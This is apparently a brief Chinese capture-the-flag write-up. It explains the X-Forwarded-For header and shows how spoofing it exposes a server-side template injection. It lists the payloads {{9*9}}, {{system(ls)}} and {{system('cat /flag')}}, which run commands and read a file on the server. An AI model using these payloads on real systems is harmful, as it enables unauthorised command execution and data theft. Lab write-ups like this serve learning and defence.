知识点:
看到ip一般先想到XFF(X-Forwarded-For)
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。说白了就是检测外来接入的IP地址的东西
.
抓包,添加
X-Forwarded-For: 1
看到的确改变了ip;
尝试模板注入:
这里的模板注入没有绕过;
直接尝试{{9*9}} 回显有81则说明有模板注入;
然后直接{{system(ls)}}
最后打开{{system('cat /flag')}}